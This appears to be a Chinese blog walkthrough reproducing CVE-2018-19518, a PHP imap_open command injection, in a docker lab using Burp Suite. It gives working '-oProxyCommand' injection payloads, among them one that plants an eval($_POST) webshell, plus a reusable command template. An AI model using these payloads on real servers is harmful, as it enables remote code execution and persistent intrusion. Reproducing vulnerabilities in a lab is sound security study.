CVE-2018-19518PHP漏洞

1.启动环境

bash 复制代码
docker-compose up -d

2.访问网站

bash 复制代码
http://192.168.63.156:8080/

3.打开BurpSuite

拦截到访问请求,发送到repeater。修改请求内容

bash 复制代码
hostname=x+-oProxyCommand%3decho%09ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQ%3d%3d|base64%09-d|sh}&username=xxx&password=xxx

执行的命令是

bash 复制代码
echo '1234567890'>/tmp/test0001

进行base64加密后变成

bash 复制代码
ZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQ==

需要转换一下,+(%2b);TAB(%09);=(%3d)

bash 复制代码
ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQ%3d%3d

完整的请求

bash 复制代码
hostname=x+-oProxyCommand%3decho%09ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQ%3d%3d|base64%09-d|sh}&username=xxx&password=xxx
bash 复制代码
# 原始payload
x+-oProxyCommand=echo	echo '<?php eval($_POST[1]);' > /var/www/html/1.php|base64	-d|sh}

# base64+url编码以后
hostname=x+-oProxyCommand%3decho%09ZWNobyAnPD9waHAgZXZhbCgkX1BPU1RbMV0pOycgPiAvdmFyL3d3dy9odG1sLzEucGhw%3d|base64%09-d|sh}

# 模板
hostname=x+-oProxyCommand%3decho%09【要执行命令的base64】|base64%09-d|sh}&username=xxx&password=xxx

这个请求forward以后。

在bash中查看是否创建成功。执行下面命令进入环境bash

bash 复制代码
sudo docker exec -it e78a02c75bd8 /bin/bash

可以看到已经创建成功test0001

参考

https://www.bilibili.com/video/BV1k14y1L7Sj?spm_id_from=333.788.videopod.episodes&vd_source=4677d71876ccb847909253468ef2f55c&p=4

CVE-2018-19518 漏洞复现-CSDN博客

相关推荐
OpenPomeloxCommunity1 小时前
Linux 驱动基础(二):驱动自动加载的设计与实现
linux
yyk333241 小时前
Linux常见的基础命令
linux·运维·服务器
启博网络2 小时前
实战:无公网IP环境下的企业异地组网方案(附拓扑与IP规划)
linux·网络·tcp/ip
Soari3 小时前
Linux 内核对比:PREEMPT_DYNAMIC vs PREEMPT_RT
linux·运维·ubuntu
Dr_Fourier4 小时前
mmap的使用与底层原理
linux·c++
linx2955 小时前
单元五 · 对称认知·下:编译与链接
linux·c语言·开发语言·c++·嵌入式硬件
橘色的喵5 小时前
Claude Code 状态栏脚本:一行显示模型、上下文占用、git 分支和当前目录
linux·git·bash·claude
Jason_zhao_MR5 小时前
新国标下DTUFTU设计最优解——米尔基于全志T153核心板_排版优化
linux·单片机·架构·t113i·双处理器·mcu+linux·电力采集
程序员-Benothing5 小时前
Linux 用户与用户组管理:useradd usermod groupadd 实战
linux·运维·服务器
byte轻骑兵5 小时前
【BlueZ 】util 模块:通用工具函数,源码中高频复用的基础组件
linux·人工智能·bluez·电脑蓝牙·嵌入式蓝牙